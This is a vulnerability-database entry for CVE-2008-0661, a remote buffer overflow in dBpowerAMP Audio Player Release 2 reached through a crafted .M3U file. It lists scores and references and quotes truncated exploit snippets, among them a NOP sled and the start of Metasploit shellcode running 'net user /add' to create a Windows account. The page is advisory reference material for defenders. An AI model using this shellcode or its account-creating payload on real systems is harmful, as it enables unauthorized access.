Published: 08/02/2008 Updated: 15/10/2018

CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6

VMScore: 690

Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Buffer overflow in dBpowerAMP Audio Player Release 2 allows remote malicious users to execute arbitrary code via a .M3U file with a long URI. NOTE: this might be the same issue as CVE-2004-1569.

Vulnerable Product	Search on Vulmon	Subscribe to Product
illustrate dbpoweramp audio player 2.0

dBpowerAMP Audio Player local buffer overflow exploit (EDI overwrite method used) ...

#################################################################### # # dBpowerAMP Audio Player Release 2 Remote Buffer Overflow Exploit # # # # # # # $nop= "\x90" x 65; # # win32_exec - CMD=cmd /k net user /add secur frog Size=188 metasploitcommetasploitcom 253 # my $shellcode = "\x29\xc9\x83\xe9\xd7\xd9\xee\xd9\x74\x24\xf4\x5b\x8 ...

# dBpowerAMP Audio Player Release 2 Remote Buffer Overflow # 0:002> r # eax=00000000 ebx=77c17a50 ecx=00000000 edx=00000107 esi=00000000 edi=00b8f217 # eip=00004141 esp=00b8ede0 ebp=77c0f931 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 # 00004141 ?? ??? # EXCEPTION_RECORD: ffffffff -- (exr ffff ...

CWE-119 http://www.securityfocus.com/bid/27635 http://www.securityfocus.com/bid/27639 http://securityreason.com/securityalert/3623 https://www.exploit-db.com/exploits/5069 https://www.exploit-db.com/exploits/5067 http://www.securityfocus.com/archive/1/487605/100/0/threaded https://nvd.nist.gov https://packetstormsecurity.com/files/93388/dBpowerAMP-Audio-Player-Buffer-Overflow.html https://www.exploit-db.com/exploits/5069/

CVE-2008-0661

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect